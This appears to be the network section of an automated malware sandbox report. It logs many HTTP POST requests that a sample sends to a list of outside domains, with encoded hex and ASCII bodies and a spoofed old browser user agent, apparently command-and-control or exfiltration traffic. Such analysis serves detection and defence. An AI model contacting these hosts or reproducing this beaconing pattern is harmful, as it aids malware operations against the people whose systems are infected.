tOb8jrHwhCSzx4Gv0LJekAqoSrfvnwzmdfoeTA1LeA+rP2FfVuhyHMiGLac7itRIm8m2SvHxBniU4boukYaaPe++ZqSHp6xYH3e9AMDVbacNxMckjyYvVaw1wAcUpFF2+COSLD0MdCTpMOCLyHgAyzxrgWH3b4MB5xPLutinzECjPFGH3zEcKqEqmglYyEapqukFBaYQh/K4rbFUf7WXt3gn3cFoGzIM5TX47ctZTnQXH+O4ABaVtKQcOlcURfnFHjN45qCDs/Wk9d86yKXL/+cYXtGQ3vqiNDZxiCnT1McyHKO6p6MgGQRALCpHEIqAJ57k2fMhUVPUDI0Z+PxohHi1D4NFWQ+/4QRd8jA9wZx4xATtiR6OqfymmICXxME3O1Ym+emAaulwVAsaayeOFfnaXliGLsvFxrxn2JNf2z9oZU+QywDzSM1nyAlZvAt5TN7ebnMifbNu3zC3ZGShrBE07OQMCay9Fn/Yo5u9fQzT/gxqVtzRLvILJ0kd1k6X3vG65uSIcd3LN6Qj5jY8FVs/9ynj1VWzqMNt0AIPRHaLxZ3BKf3REBzwlEAXQ5M=
                Source: global trafficHTTP traffic detected: POST / HTTP/1.1Accept: */*Accept-Language: en-usContent-Type: application/octet-streamContent-Length: 473User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)Host: adeesa.netConnection: Keep-AliveCache-Control: no-cacheData Raw: 69 47 51 63 6d 78 37 47 50 5a 69 74 32 42 4c 55 64 6f 78 36 47 53 63 6c 77 35 46 4f 58 67 72 30 45 4f 58 68 72 30 39 4a 54 63 6c 76 35 46 4f 58 67 75 33 44 4d 56 65 70 79 37 48 51 5a 6a 74 33 44 4d 56 66 70 79 38 4a 53 62 6b 76 35 45 4e 57 67 71 7a 39 49 52 62 6b 76 35 45 4e 61 6a 76 36 46 4f 59 69 74 32 42 4c 55 64 6f 31 41 4a 54 63 6c 77 35 45 4f 58 67 72 30 39 4a 53 64 72 30 41 4a 53 63 6c 77 35 45 4f 58 67 72 30 39 4a 56 65 70 79 37 48 51 5a 6a 74 32 43 4c 56 65 6f 79 37 47 51 5a 6a 77 37 48 52 62 6b 75 34 44 4e 57 66 71 7a 38 4c 56 65 71 7a 38 49 52 61 6b 75 34 44 4e 58 68 72 31 41 4a 54 63 6c 77 35 4c 57 66 70 7a 38 48 52 62 6b 75 34 47 51 5a 69 74 32 42 4c 55 65 70 79 37 48 51 5a 6d 77 37 48 53 62 6b 76 34 44 4e 61 6a 75 34 44 4e 57 68 72 32 43 4c 55 65 6f 79 37 48 54 63 6c 77 35 45 4f 58 67 72 30 39 4a 54 64 6d 77 36 46 4f 59 68 72 31 41 4a 54 64 6d 77 36 48 52 63 6d 77 35 46 50 59 68 73 34 44 4e 57 66 71 7a 38 49 52 61 6d 77 36 47 50 5a 69 74 32 43 4c 55 65 6f 78 41 4c 56 66 70 79 38 48 51 61 6a 76 35 46 4f 58 68 72 30 41 4a 53 63 6c 77 35 45 4f 58 67 72 30 41 50 5a 6a 74 32 43 4c 55 65 6f 78 39 49 53 62 6b 76 34 45 4e 57 6a 75 33 44 4d 57 66 70 7a 42 4d 57 67 71 7a 39 49 52 62 6b 75 34 44 4d 56 66 71 7a 38 49 52 62 6b 75 34 44 4d 59 68 72 31 41 4b 55 64 71 7a 39 49 52 63 6d 78 37 4a 53 62 6c 76 34 46 4f 59 69 73 31 42 4b 55 64 6d 78 36 47 50 59 6b 76 34 46 4f 59 69 73 34 45 4f 58 67 74 Data Ascii: iGQcmx7GPZit2BLUdox6GSclw5FOXgr0EOXhr09JTclv5FOXgu3DMVepy7HQZjt3DMVfpy8JSbkv5ENWgqz9IRbkv5ENajv6FOYit2BLUdo1AJTclw5EOXgr09JSdr0AJSclw5EOXgr09JVepy7HQZjt2CLVeoy7GQZjw7HRbku4DNWfqz8LVeqz8IRaku4DNXhr1AJTclw5LWfpz8HRbku4GQZit2BLUepy7HQZmw7HSbkv4DNaju4DNWhr2CLUeoy7HTclw5EOXgr09JTdmw6FOYhr1AJTdmw6HRcmw5FPYhs4DNWfqz8IRamw6GPZit2CLUeoxALVfpy8HQajv5FOXhr0AJSclw5EOXgr0APZjt2CLUeox9ISbkv4ENWju3DMWfpzBMWgqz9IRbku4DMVfqz8IRbku4DMYhr1AKUdqz9IRcmx7JSblv4FOYis1BKUdmx6GPYkv4FOYis4EOXgt
                Source: global trafficHTTP traffic detected: POST / HTTP/1.1Accept: */*Accept-Language: en-usContent-Type: application/octet-streamContent-Length: 1138User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)Host: absblast.comConnection: Keep-AliveCache-Control: no-cache
                Source: global trafficHTTP traffic detected: POST / HTTP/1.1Accept: */*Accept-Language: en-usContent-Type: application/octet-streamContent-Length: 1897User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)Host: uhsa.edu.agConnection: Keep-AliveCache-Control: no-cache
                Source: global trafficHTTP traffic detected: POST / HTTP/1.1Accept: */*Accept-Language: en-usContent-Type: application/octet-streamContent-Length: 214User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)Host: sokuwan.netConnection: Keep-AliveCache-Control: no-cacheData Raw: 78 52 62 6c 76 35 46 4f 59 68 73 31 42 4c 55 65 6f 79 37 49 52 62 6b 76 34 45 4f 58 68 72 31 42 4b 55 64 6f 78 37 47 51 61 6a 75 33 44 4d 57 67 71 30 39 4a 54 63 6d 78 38 49 53 64 6d 78 36 47 50 5a 6a 74 33 43 4e 58 67 72 30 41 4a 54 63 6d 78 36 47 51 5a 6a 74 33 44 4d 57 66 71 7a 39 4a 53 63 6c 77 35 46 4f 59 69 74 33 43 4d 56 66 71 7a 39 49 53 62 6c 76 35 46 50 5a 6a 75 33 44 4e 57 67 71 30 39 4a 53 63 6d 78 36 47 50 5a 69 74 32 43 4c 56 66 71 7a 39 49 53 63 6c 77 35 46 50 59 69 73 32 42 4c 55 65 70 7a 38 49 52 62 6b 76 34 45 4e 58 67 72 31 41 4b 54 64 6d 78 37 47 51 5a 6a 75 33 44 4e 57 67 71 30 39 4a 53 63 6c 77 36 46 50 59 69 74 Data Ascii: xRblv5FOYhs1BLUeoy7IRbkv4EOXhr1BKUdox7GQaju3DMWgq09JTcmx8ISdmx6GPZjt3CNXgr0AJTcmx6GQZjt3DMWfqz9JSclw5FOYit3CMVfqz9ISblv5FPZju3DNWgq09JScmx6GPZit2CLVfqz9ISclw5FPYis2BLUepz8IRbkv4ENXgr1AKTdmx7GQZju3DNWgq09JSclw6FPYit
                Source: global trafficHTTP traffic detected: POST / HTTP/1.1Accept: */*Accept-Language: en-usContent-Type: application/octet-streamContent-Length: 714User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)Host: vonparis.comConnection: Keep-AliveCache-Control: no-cacheData Raw: 44 76 35 46 4f 59 68 73 31 42 4b 55 64 6f 78 37 47 51 5a 6a 74 33 43 4d 56 66 70 7a 38 49 53 62 6c 76 35 45 4f 58 68 72 31 41 4b 55 64 6f 78 37 4f 59 68 73 31 42 4b 55 64 6f 78 37 48 51 61 6a 75 34 44 4e 57 66 71 7a 39 4a 53 63 6c 77 35 46 4f 59 68 73 31 42 4b 55 64 6f 79 37 48 51 61 6a 75 33 44 4d 57 66 71 7a 39 49 53 62 6c 77 35 46 4f 59 68 73 31 42 4b 54 64 6d 78 37 47 51 5a 6a 74 33 44 4d 57 66 71 7a 39 49 53 62 6c 76 35 45 4f 58 68 72 31 41 4b 54 64 6d 78 36 47 50 5a 69 74 32 43 4c 56 65 70 79 38 48 51 61 6a 75 33 44 4e 57 67 71 30 39 4a 53 63 6c 77 35 46 4f 59 68 73 32 42 4c 55 65 6f 79 37 48 51 61 6a 75 33 44 4d 57 66 71 7a 39 4a 53 62 6c 76 35 45 4f 59 68 72 31 41 4b 55 67 71 30 39 4a 55 67 71 30 41 4a 54 63 6d 77 35 46 4f 59 68 77 35 46 4f 59 68 73 31 42 4b 55 64 6f 79 37 48 51 62 6f 79 37 47 51 5a 6a 74 33 43 4d 56 66 70 7a 38 49 52 62 6c 76 35 45 4f 58 68 72 31 41 4b 54 64 6f 78 37 47 51 5a 6a 74 33 43 4c 56 66 70 41 4a 53 62 6c 76 34 44 4e 57 66 70 79 37 48 51 5a 69 73 32 42 4b 54 63 6c 76 35 45 4e 57 66 71 7a 38 48 51 5a 6a 74 32 42 4b 55 64 6d 77 35 45 4f 58 67 71 7a 46 4f 58 67 71 32 42 4b 55 64 6d 77 35 46 4f 58 67 72 30 41 4b 54 63 6c 76 35 45 4e 57 66 70 79 38 48 51 61 6a 74 32 42 4b 54 64 6d 77 35 45 4e 58 67 71 30 39 49 52 61 6b 75 33 43 4e 57 66 70 79 37 47 51 5a 69 73 31 41 4b 54 63 6c 76 35 45 4e 57 66 71 7a 38 49 52 61 6a 75 33 43 4c 55 64 6f 78 36 46 50 59 68 72 30 39 49 52 62 6b 75 33 44 4d 56 65 6f 30 39 49 53 62 6b 75 33 43 4d 56 65 6f 79 37 47 50 59 68 72 31 41 4a 53 62 6b 76 34 44 4d 57 66 70 79 37 47 51 5a 69 74 32 42 4b 54 63 6d 77 35 45 4e 57 66 71 7a 38 48 51 61 6a 74 32 42 4b 55 64 6d 77 36 46 4f 58 67 71 30 39 49 52 61 6b 75 33 43 4c 56 65 6f 78 36 46 4f 59 68 72 30 41 4a 53 62 6c 76 34 44 4d 56 66 70 79 38 48 51 61 6b 75 33 43 4c 55 65 6f 78 36 46 50 59 69 73 31 41 4a 53 62 6c 76 34 44 4d 57 66 70 79 38 48 51 5a 69 74 32 42 4b 55 64 6d 77 35 46 4f 58 67 71 7a 38 49 52 61 6a 75 35 48 51 66 78 39 4a 53 62 74 45 61 78 48 5a 6b 38 55 72 48 61 74 42 53 6c 36 53 6c 32 4c 67 32 4b 62 77 49 66 31 49 64 78 47 5a 75 41 54 71 38 50 68 31 4c 66 30 48 61 75 46 5a 75 44 59 6f 36 4f Data Ascii: Dv5FOYhs1BKUdox7GQZjt3CMVfpz8ISblv5EOXhr1AKUdox7OYhs1BKUdox7HQaju4DNWfqz9JSclw5FOYhs1BKUdoy7HQaju3DMWfqz9ISblw5FOYhs1BKTdmx7GQZjt3DMWfqz9ISblv5EOXhr1AKTdmx6GPZit2CLVepy8HQaju3DNWgq09JSclw5FOYhs2BLUeoy7HQaju3DMWfqz9JSblv5EOYhr1AKUgq09JUgq0AJTcmw5FOYhw5FOYhs1BKUdoy7HQboy7GQZjt3CMVfpz8IRblv5EOXhr1AKTdox7GQZjt3CLVfpAJSblv4DNWfpy7HQZis2BKTclv5ENWfqz8HQZjt2BKUdmw5EOXgqzFOXgq2BKUdmw5FOXgr0AKTclv5ENWfpy8HQajt2BKTdmw5ENXgq09IRaku3CNWfpy7GQZis1AKTclv5ENWfqz8IRaju3CLUdox6FPYhr09IRbku3DMVeo09ISbku3CMVeoy7GPYhr1AJSbkv4DMWfpy7GQZit2BKTcmw5ENWfqz8HQajt2BKUdmw6FOXgq09IRaku3CLVeox6FOYhr0AJSb
                Source: global trafficHTTP traffic detected: POST / HTTP/1.1Accept: */*Accept-Language: en-usContent-Type: application/octet-streamContent-Length: 734User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)Host: mijash3.comConnection: Keep-AliveCache-Control: no-cacheData Raw: 57 35 47 50 5a 6a 74 33 44 4d 57 67 71 30 41 4a 54 64 6d 78 36 47 51 5a 6a 75 33 44 4e 57 67 72 30 41 4a 55 64 6f 78 37 49 52 62 6c 76 35 46 4f 59 69 73 32 43 4c 56 65 70 7a 39 49 53 63 6c 77 36 46 50 5a 69 74 33 43 4d 57 66 71 30 39 4a 54 63 6d 77 36 47 50 5a 6a 74 33 44 4d 57 67 71 30 41 4a 54 64 6d 78 37 47 51 61 6a 75 33 44 4e 57 68 72 31 41 4b 55 64 6f 79 37 48 52 61 6b 75 34 45 4f 58 68 72 31 42 4c 55 65 70 7a 38 49 53 62 6c 76 35 46 4f 59 69 73 32 43 4c 56 65 70 7a 38 49 53 62 6c 76 35 46 50 59 69 74 32 43 4d 56 66 71 7a 39 4a 53 63 6d 77 36 46 50 5a 69 74 32 43 4d 57 66 71 30 39 4a 54 64 6f 79 37 48 52 61 6b 76 34 45 4e 59 68 73 31 42 4c 55 65 6f 79 38 48 52 62 6b 76 35 45 4f 58 68 73 31 42 4c 55 65 6f 7a 38 49 52 62 6c 76 35 46 4f 59 69 73 32 42 4c 56 65 70 7a 39 49 53 62 6c 77 35 46 50 59 69 74 32 43 4d 56 66 70 7a 39 4a 53 63 6d 77 36 46 50 5a 69 74 32 43 4d 56 66 71 30 39 4a 54 63 6d 77 36 47 50 5a 6a 74 33 44 4e 57 67 71 30 41 4a 54 63 6d 78 37 48 51 61 6b 75 34 45 4e 58 68 73 31 43 4d 57 66 71 30 39 4a 54 63 6d 77 36 47 50 5a 6a 74 33 44 4d 57 66 71 30 41 4a 54 64 6d 78 37 47 51 5a 6a 75 33 44 4e 58 67 72 31 41 4b 55 64 6f 79 37 48 52 61 6b 75 34 45 4e 58 68 72 31 42 4c 55 65 70 79 38 49 52 62 6c 76 35 45 4f 59 68 73 32 42 4c 56 65 70 7a 38 49 52 62 6c 76 35 46 50 59 69 73 32 43 4c 56 66 70 7a 39 49 53 63 6c 77 38 48 52 61 6b 76 34 45 4f 58 68 73 31 42 4c 55 65 70 79 38 49 52 62 6c 76 35 46 4f 59 68 73 32 42 4c 56 65 70 79 38 49 52 62 6c 76 35 45 4f 59 68 73 32 42 4c 56 65 70 7a 38 49 53 62 6c 76 35 46 4f 59 69 73 32 42 4c 56 65 70 7a 38 49 53 62 6c 76 35 46 59 6a 79 44 4f 58 68 73 31 45 57 70 37 53 6f 38 55 73 39 4f 68 34 56 71 43 61 76 47 58 71 41 56 73 43 62 77 47 62 77 49 61 77 48 59 75 46 5a 75 44 58 73 43 57 73 42 56 72 42 57 70 37 54 6d 43 56 70 42 56 71 37 51 70 41 56 70 38 54 70 35 53 6b 30 45 57 74 43 58 73 45 61 75 47 59 74 44 58 72 44 5a 71 38 52 6d 41 56 72 41 53 65 7a 52 6f 39 53 6b 34 53 6c 35 50 6c 35 4f 6c 37 52 6d 36 54 71 38 55 71 41 52 6c 35 51 6a 36 4f 67 31 4c 67 32 4d 66 7a 4a 64 73 38 52 6b 36 52 6c 41 56 71 42 57 70 41 55 71 39 52 6c 37 53 69 79 46 62 32 4e 62 72 35 4b 62 30 4b 66 30 4c 66 79 41 56 76 4d 6a 33 4b 65 74 38 4d Data Ascii: W5GPZjt3DMWgq0AJTdmx6GQZju3DNWgr0AJUdox7IRblv5FOYis2CLVepz9ISclw6FPZit3CMWfq09JTcmw6GPZjt3DMWgq0AJTdmx7GQaju3DNWhr1AKUdoy7HRaku4EOXhr1BLUepz8ISblv5FOYis2CLVepz8ISblv5FPYit2CMVfqz9JScmw6FPZit2CMWfq09JTdoy7HRakv4ENYhs1BLUeoy8HRbkv5EOXhs1BLUeoz8IRblv5FOYis2BLVepz9ISblw5FPYit2CMVfpz9JScmw6FPZit2CMVfq09JTcmw6GPZjt3DNWgq0AJTcmx7HQaku4ENXhs1CMWfq09JTcmw6GPZjt3DMWfq0AJTdmx7GQZju3DNXgr1AKUdoy7HRaku4ENXhr1BLUepy8IRblv5EOYhs2BLVepz8IRblv5FPYis2CLVfpz9ISclw8HRakv4EOXhs1BLUepy8IRblv5FOYhs2BLVepy8IRblv5EOYhs2BLVepz8ISblv5FOYis2BLV
                Source: global trafficHTTP traffic detected: POST / HTTP/1.1Accept: */*Accept-Language: en-usContent-Type: application/octet-streamContent-Length: 318User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)Host: mijash3.comConnection: Keep-AliveCache-Control: no-cacheData Raw: 76 62 76 38 51 68 33 4c 69 33 4e 6b 34 50 70 36 54 6f 39 55 71 39 53 6d 33 50 6d 39 56 69 32 4b 68 31 4b 65 31 4a 63 7a 4a 62 77 45 59 78 47 62 79 48 65 79 49 62 72 39 54 72 41 56 71 39 53 6c 38 4f 69 31 4d 68 33 4c 67 30 4d 68 33 50 69 33 50 6a 37 52 6b 35 4f 68 33 50 68 7a 4c 68 31 4d 68 31 4c 67 35 4d 67 33 4c 66 32 4d 68 34 4f 6d 42 53 67 34 50 67 30 46 61 75 45 57 72 43 57 73 42 55 6d 41 56 75 49 64 30 4b 5a 31 4c 68 31 49 63 7a 49 63 76 44 57 71 39 55 70 44 57 72 43 58 76 47 63 77 46 58 72 42 61 77 48 64 77 45 56 69 78 46 63 32 4e 67 7a 48 61 6f 35 4c 65 77 49 64 79 47 59 75 48 63 78 39 4a 53 63 76 41 50 67 75 43 51 65 74 37 4c 5a 70 33 49 61 73 44 5a 77 44 58 74 46 62 75 44 58 71 41 55 70 41 55 70 37 51 6c 37 51 6b 33 51 68 35 51 6f 33 4b 61 74 41 4f 63 77 47 63 78 48 62 76 42 56 72 42 55 73 45 59 74 45 58 72 44 57 73 47 58 73 41 56 70 41 54 6f 39 55 71 42 54 6f 38 52 6b 35 52 6a 35 50 68 32 4f 6a 32 4f 68 33 4e 64 77 4a 65 7a 4b 67 Data Ascii: vbv8Qh3Li3Nk4Pp6To9Uq9Sm3Pm9Vi2Kh1Ke1JczJbwEYxGbyHeyIbr9TrAVq9Sl8Oi1Mh3Lg0Mh3Pi3Pj7Rk5Oh3PhzLh1Mh1Lg5Mg3Lf2Mh4OmBSg4Pg0FauEWrCWsBUmAVuId0KZ1Lh1IczIcvDWq9UpDWrCXvGcwFXrBawHdwEVixFc2NgzHao5LewIdyGYuHcx9JScvAPguCQet7LZp3IasDZwDXtFbuDXqAUpAUp7Ql7Qk3Qh5Qo3KatAOcwGcxHbvBVrBUsEYtEXrDWsGXsAVpATo9UqBTo8Rk5Rj5Ph2Oj2Oh3NdwJezKg
                Source: global trafficHTTP traffic detected: POST / HTTP/1.1Accept: */*Accept-Language: en-usContent-Type: application/octet-streamContent-Length: 122User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)Host: deckoviny.czConnection: Keep-AliveCache-Control: no-cacheData Raw: 36 44 59 76 4d 63 79 48 62 75 42 58 72 43 58 6f 30 48 65 33 51 72 42 50 67 34 51 6d 44 55 71 44 62 7a 4e 66 32 4f 6f 37 53 6f 41 55 6f 37 56 74 42 55 71 41 56 75 44 59 74 45 5a 72 43 56 71 37 50 6c 37 51 6c 36 50 66 32 4c 65 31 4c 65 7a 4e 68 32 4d 63 7a 4d 68 34 50 68 33 51 6d 36 51 6c 37 52 6b 32 4c 69 33 4f 6a 34 50 6a 33 4d 68 32 4d 69 30 4a 64 79 49 5a 73 45 Data Ascii: 6DYvMcyHbuBXrCXo0He3QrBPg4QmDUqDbzNf2Oo7SoAUo7VtBUqAVuDYtEZrCVq7Pl7Ql6Pf2Le1LezNh2MczMh4Ph3Qm6Ql7Rk2Li3Oj4Pj3Mh2Mi0JdyIZsE
                Source: global trafficHTTP traffic detected: POST / HTTP/1.1Accept: */*Accept-Language: en-usContent-Type: application/octet-streamContent-Length: 293User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)Host: icd-host.comConnection: Keep-AliveCache-Control: no-cacheData Raw: 51 37 48 51 61 6a 74 33 43 4c 56 65 6f 79 37 47 51 5a 69 74 32 42 4b 55 64 6d 77 36 46 4f 58 68 73 31 41 4b 54 63 6c 77 35 45 4f 58 67 72 30 39 4a 53 62 6c 76 34 44 4e 57 66 70 7a 38 48 52 61 6a 75 33 44 4d 56 66 70 79 37 48 51 5a 6a 74 32 43 4c 55 65 6f 78 36 47 50 59 68 73 31 41 4b 54 63 6d 77 35 45 4f 58 67 72 30 39 4a 53 62 6b 76 34 44 4e 57 66 70 7a 38 48 52 61 6a 74 33 43 4c 56 65 6f 79 37 47 51 5a 69 74 32 42 4b 55 64 6d 78 36 46 4f 59 68 72 31 41 4a 53 63 6c 77 36 46 4f 59 69 73 31 42 4b 54 64 6d 77 36 46 4f 59 68 72 31 41 4a 53 63 6c 76 35 45 4e 57 67 71 7a 39 49 52 61 6b 75 33 44 4d 56 65 70 79 37 48 51 5a 6a 74 32 42 4c 55 64 6f 78 36 46 50 59 68 73 31 41 4a 54 63 6c 76 35 45 4e 58 67 71 30 39 49 52 62 6b 75 34 44 4d 57 66 70 79 38 48 51 61 6a 74 33 43 4c 55 65 6f 78 37 47 50 5a 69 73 32 42 4b 54 64 6d 77 36 46 50 59 68 73 31 41 4a 54 63 6c 77 35 45 4e 58 Data Ascii: Q7HQajt3CLVeoy7GQZit2BKUdmw6FOXhs1AKTclw5EOXgr09JSblv4DNWfpz8HRaju3DMVfpy7HQZjt2CLUeox6GPYhs1AKTcmw5EOXgr09JSbkv4DNWfpz8HRajt3CLVeoy7GQZit2BKUdmx6FOYhr1AJSclw6FOYis1BKTdmw6FOYhr1AJSclv5ENWgqz9IRaku3DMVepy7HQZjt2BLUdox6FPYhs1AJTclv5ENXgq09IRbku4DMWfpy8HQajt3CLUeox7GPZis2BKTdmw6FPYhs1AJTclw5ENX
                Source: global trafficHTTP traffic detected: POST / HTTP/1.1Accept: *Accept-Language: en-usContent-Type: application/octet-streamConnection: keep-aliveContent-Length: 4776User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)Host: mackusick.comCache-Control: no-cache
                Source: global trafficHTTP traffic detected: POST / HTTP/1.1Accept: */*Accept-Language: en-usContent-Type: application/octet-streamContent-Length: 556User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)Host: www.rs-ag.comCache-Control: no-cacheData Raw: 78 63 66 68 4b 30 53 74 48 79 56 6f 57 4f 6a 64 58 39 65 33 71 52 66 35 58 53 35 38 48 32 57 4f 75 48 5a 6d 6b 43 42 41 6b 51 72 67 37 6e 58 54 65 47 41 67 65 57 74 47 52 61 55 64 67 43 44 70 66 74 51 74 48 4f 36 38 30 6c 4e 52 39 49 49 2b 63 64 59 36 66 4f 75 2b 53 62 69 52 74 33 62 38 35 68 6a 62 6c 4f 4e 54 75 32 6f 63 4e 34 76 31 7a 68 43 64 47 4f 4a 59 49 2b 77 4c 66 49 71 64 64 30 4a 4e 5a 70 70 2f 57 39 71 75 4d 4f 73 61 6b 38 76 56 66 44 69 4c 68 73 49 78 58 50 48 6d 67 76 56 57 5a 79 71 34 75 4f 6a 47 50 67 77 67 77 72 5a 71 37 4e 75 64 7a 4f 34 50 51 43 47 4f 37 52 77 6c 6b 53 46 6e 42 36 67 35 6c 71 62 45 33 39 2f 31 6c 71 6c 75 4b 38 76 39 66 57 2f 6e 62 4e 38 69 32 62 6f 34 47 72 2b 45 75 78 4d 79 5a 31 46 46 6c 48 50 65 31 52 53 61 2b 68 47 6f 65 4e 36 74 4a 68 62 41 71 36 32 73 70 56 53 38 70 4c 68 63 45 51 4e 70 30 43 53 7a 57 77 6a 78 73 48 54 4c 70 6b 45 31 55 73 55 61 42 65 69 51 34 75 71 62 35 2f 46 36 2b 72 73 61 30 34 69 39 6a 6d 64 34 44 65 6d 61 54 6d 5a 74 37 2f 6e 4b 77 35 7a 49 4b 79 48 30 2f 42 73 74 6e 6f 6d 41 36 34 45 61 71 46 67 35 58 79 51 75 45 70 78 68 47 73 34 43 72 45 2f 36 53 69 74 43 48 73 57 66 56 6f 64 33 71 6c 5a 61 45 32 47 4e 66 69 59 54 6d 62 7a 47 33 51 6c 66 52 74 45 6e 38 49 46 51 48 51 6e 6c 33 41 2b 2f 46 56 72 63 7a 43 76 63 58 69 38 6a 74 32 67 71 5a 7a 32 33 51 34 76 35 38 51 66 6e 4f 5a 48 38 32 4d 6e 4b 2b 52 58 74 63 72 72 64 41 4a 70 6a 47 2f 62 46 6a 7a 4d 64 64 31 75 4a 48 77 71 79 32 70 6e 63 61 33 53 32 52 6b 51 5a 41 41 42 33 79 4c 4c 55 7a 55 4c 57 56 70 46 31 61 32 48 47 78 6b 51 68 68 4f 65 71 68 6a 5a 66 46 42 49 45 5a 34 62 74 38 47 75 65 77 33 31 46 76 62 50 46 61 37 59 3d Data Ascii: xcfhK0StHyVoWOjdX9e3qRf5XS58H2WOuHZmkCBAkQrg7nXTeGAgeWtGRaUdgCDpftQtHO680lNR9II+cdY6fOu+SbiRt3b85hjblONTu2ocN4v1zhCdGOJYI+wLfIqdd0JNZpp/W9quMOsak8vVfDiLhsIxXPHmgvVWZyq4uOjGPgwgwrZq7NudzO4PQCGO7RwlkSFnB6g5lqbE39/1lqluK8v9fW/nbN8i2bo4Gr+EuxMyZ1FFlHPe1RSa+hGoeN6tJhbAq62spVS8pLhcEQNp0CSzWwjxsHTLpkE1UsUaBeiQ4uqb5/F6+rsa04i9jmd4DemaTmZt7/nKw5zIKyH0/BstnomA64EaqFg5XyQuEpxhGs4CrE/6SitCHsWfVod3qlZaE2GNfiYTmbzG3QlfRtEn8IFQHQnl3A+/FVrczCvcXi8jt2gqZz23Q4v58QfnOZH82MnK+RXtcrrdAJpjG/bFjzMdd1uJHwqy2pnca3S2RkQZAAB3yLLUzULWVpF1a2HGxkQhhOeqhjZfFBIEZ4bt8Guew31FvbPFa7Y=
                Source: global trafficHTTP traffic detected: POST / HTTP/1.1Accept: */*Accept-Language: en-usContent-Type: application/octet-streamContent-Length: 972User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)Host: zupraha.czConnection: Keep-AliveCache-Control: no-cache
                Source: global trafficHTTP traffic detected: POST / HTTP/1.1Accept: */*Accept-Language: en-usContent-Type: application/octet-streamContent-Length: 1991User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)Host: jsaps.comConnection: Keep-AliveCache-Control: no-cache
                Source: global trafficHTTP traffic detected: POST / HTTP/1.1Accept: */*Accept-Language: en-usContent-Type: application/octet-streamContent-Length: 311User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)Host: daytonir.comConnection: Keep-AliveCache-Control: no-cacheData Raw: 69 4a 54 63 6d 77 37 48 52 61 6a 75 33 43 4f 59 68 72 31 42 4b 54 64 6d 77 36 46 52 64 6f 78 36 47 50 59 69 73 31 42 4b 54 64 6d 77 36 46 50 59 68 73 31 41 4b 54 63 6d 77 35 46 4f 58 68 72 31 41 4b 54 64 6d 78 36 46 4f 59 68 72 31 41 4b 54 63 6d 77 35 46 4f 58 68 72 30 41 4a 53 63 6c 76 35 45 4e 58 67 71 30 39 49 53 62 6b 76 34 44 4e 57 66 71 7a 38 49 52 61 6b 75 34 44 4d 57 66 70 7a 39 49 52 62 6b 75 34 44 4d 57 66 70 7a 38 48 52 61 6a 75 33 43 4d 56 65 70 79 37 48 51 5a 6a 74 32 43 4c 55 65 6f 78 37 47 50 5a 69 73 32 42 4b 55 64 6f 78 36 47 50 59 69 73 31 42 4b 54 64 6d 78 37 47 50 5a 69 73 32 42 4c 55 64 6f 78 36 46 50 59 68 73 43 4c 55 64 6d 77 35 45 4f 58 67 71 7a 38 48 51 5a 69 73 31 41 4a 53 62 6b 75 33 43 4c 55 64 6d 77 35 45 4e 57 67 71 7a 38 48 51 5a 6a 74 32 42 4b 54 63 6c 76 34 44 4d 56 65 6f 78 36 46 4f 58 67 71 7a 38 48 51 5a 69 73 31 41 4a 53 62 6b 76 34 44 4d 56 65 6f 78 36 46 4f 58 67 71 7a 38 48 51 5a Data Ascii: iJTcmw7HRaju3COYhr1BKTdmw6FRdox6GPYis1BKTdmw6FPYhs1AKTcmw5FOXhr1AKTdmx6FOYhr1AKTcmw5FOXhr0AJSclv5ENXgq09ISbkv4DNWfqz8IRaku4DMWfpz9IRbku4DMWfpz8HRaju3CMVepy7HQZjt2CLUeox7GPZis2BKUdox6GPYis1BKTdmx7GPZis2BLUdox6FPYhsCLUdmw5EOXgqz8HQZis1AJSbku3CLUdmw5ENWgqz8HQZjt2BKTclv4DMVeox6FOXgqz8HQZis1AJSbkv4DMVeox6FOXgqz8HQZ
                Source: global trafficHTTP traffic detected: POST / HTTP/1.1Accept: */*Accept-Language: en-usContent-Type: application/octet-streamContent-Length: 445User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)Host: redgiga.comConnection: Keep-AliveCache-Control: no-cacheData Raw: 35 75 4b 67 75 44 56 6f 37 52 6b 33 4d 68 32 4b 61 75 45 58 73 43 50 64 77 4c 64 30 52 6f 44 58 74 39 54 6d 37 50 69 34 4c 68 32 4c 68 30 4b 63 72 37 53 71 45 61 71 38 51 6b 35 4f 6a 34 50 68 32 4c 67 78 49 64 33 49 5a 74 44 58 73 38 56 74 35 4e 67 32 49 65 32 49 62 76 47 59 73 45 58 72 41 55 71 38 54 6f 41 54 6a 36 4f 68 33 4f 67 30 4b 66 7a 4b 65 76 46 59 75 47 62 74 44 59 73 43 55 71 41 53 6d 34 4a 59 79 4d 6a 38 4e 65 76 44 59 72 39 53 6f 36 51 6a 33 4d 67 30 4c 64 73 43 58 71 38 4b 64 31 4f 6b 31 47 55 6a 79 46 58 72 43 57 72 37 51 6a 35 4e 68 33 4e 69 7a 43 5a 71 34 49 56 70 41 54 6f 38 4a 53 62 6b 75 33 43 4c 55 64 6d 78 37 47 50 59 68 72 33 43 34 4c 54 65 6f 79 37 47 50 59 68 72 30 39 49 53 62 6b 75 33 43 4c 55 64 6d 77 42 54 6f 37 53 6f 41 54 6f 37 52 6f 37 4a 63 74 38 50 67 34 4e 68 32 4b 64 76 45 5a 75 44 57 72 43 59 74 43 53 6c 36 50 69 33 4d 67 7a 4b 64 77 47 58 73 39 52 6b 37 52 6a 34 4f 66 76 46 59 74 42 55 70 37 53 69 34 4f 69 35 50 68 